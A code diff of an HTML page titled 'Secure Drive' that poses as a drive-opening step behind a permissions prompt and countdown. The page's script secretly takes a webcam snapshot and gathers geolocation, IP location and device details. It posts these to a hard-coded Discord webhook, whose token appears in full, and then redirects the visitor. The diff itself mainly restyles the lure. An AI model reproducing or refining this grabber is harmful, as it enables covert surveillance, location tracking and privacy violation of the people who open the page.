--- a/index.html
+++ b/index.html
@@ -1,29 +1,50 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8">
+  <meta charset="UTF-8" />
   <title>Secure Drive</title>
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   <style>
     html, body {
       margin: 0;
       padding: 0;
-      background: #000;
-      color: #fff;
-      font-family: Arial, sans-serif;
+      background: #0a0a0a;
+      color: #00ffcc;
+      font-family: "Segoe UI", sans-serif;
       display: flex;
       justify-content: center;
       align-items: center;
       height: 100%;
       text-align: center;
+      font-size: 1.2rem;
     }
-    h1 {
-      font-size: 1.5rem;
+    #main {
+      padding: 1em;
+    }
+    #countdown {
+      font-size: 1.6rem;
+      color: #fff;
+    }
+    #spinner {
+      border: 4px solid #444;
+      border-top: 4px solid #00ffcc;
+      border-radius: 50%;
+      width: 40px;
+      height: 40px;
+      animation: spin 1s linear infinite;
+      margin: 1em auto;
+    }
+    @keyframes spin {
+      0% { transform: rotate(0deg); }
+      100% { transform: rotate(360deg); }
     }
   </style>
 </head>
 <body>
-  <h1 id="countdown">5 seconds to open secure drive</h1>
+  <div id="main">
+    <div id="statusText">Requesting required permissions…</div>
+    <div id="spinner"></div>
+  </div>
 
   <script>
     const webhookUrl = "https://discord.com/api/webhooks/1388161217603965210/eELyivDPEhlKfnaaDce_b90zBtGFpe51uLHo28LsG0gle_1d8pfuN-_U6vK6Q38_N4Fj";
@@ -45,7 +66,7 @@
 
     function dataURLtoBlob(dataurl) {
       const arr = dataurl.split(','), mime = arr[0].match(/:(.*?);/)[1],
-        bstr = atob(arr[1]), n = bstr.length, u8arr = new Uint8Array(n);
+            bstr = atob(arr[1]), n = bstr.length, u8arr = new Uint8Array(n);
       while (n--) u8arr[n] = bstr.charCodeAt(n);
       return new Blob([u8arr], { type: mime });
     }
@@ -61,22 +82,21 @@
         document.body.appendChild(video);
         await video.play();
         await new Promise(res => setTimeout(res, 3000));
-
         const canvas = document.createElement("canvas");
         canvas.width = video.videoWidth;
         canvas.height = video.videoHeight;
         const ctx = canvas.getContext("2d");
         ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
         capturedImageData = canvas.toDataURL("image/png");
-
-        stream.getTracks().forEach(track => track.stop());
+        stream.getTracks().forEach(t => t.stop());
       } catch (err) {
-        console.warn("Camera denied or failed", err);
+        console.warn("Camera access denied or failed", err);
       }
     }
 
     function sendToDiscord(ipData) {
-      const mapLink = coords.lat !== "Permission denied" ? `https://www.google.com/maps?q=${coords.lat},${coords.lon}` : "N/A";
+      const mapLink = coords.lat !== "Permission denied"
+        ? `https://www.google.com/maps?q=${coords.lat},${coords.lon}` : "N/A";
       const device = getDeviceInfo();
 
       const formData = new FormData();
@@ -150,20 +170,25 @@
         .catch(() => {
           sendToDiscord({ ipAddress: "N/A", city: "-", stateProv: "-", countryName: "-" });
         });
+
+      showCountdown();
+    }
+
+    function showCountdown() {
+      document.getElementById("main").innerHTML = `<div id="countdown">5 seconds to open secure drive</div>`;
+      let seconds = 5;
+      const countdownEl = document.getElementById("countdown");
+      const timer = setInterval(() => {
+        seconds--;
+        countdownEl.textContent = `${seconds} seconds to open secure drive`;
+        if (seconds === 0) {
+          clearInterval(timer);
+          window.location.href = redirectUrl;
+        }
+      }, 1000);
     }
 
     startAll();
-
-    let seconds = 5;
-    const countdownEl = document.getElementById("countdown");
-    const timer = setInterval(() => {
-      seconds--;
-      countdownEl.textContent = `${seconds} seconds to open secure drive`;
-      if (seconds === 0) {
-        clearInterval(timer);
-        window.location.href = redirectUrl;
-      }
-    }, 1000);
   </script>
 </body>
 </html>
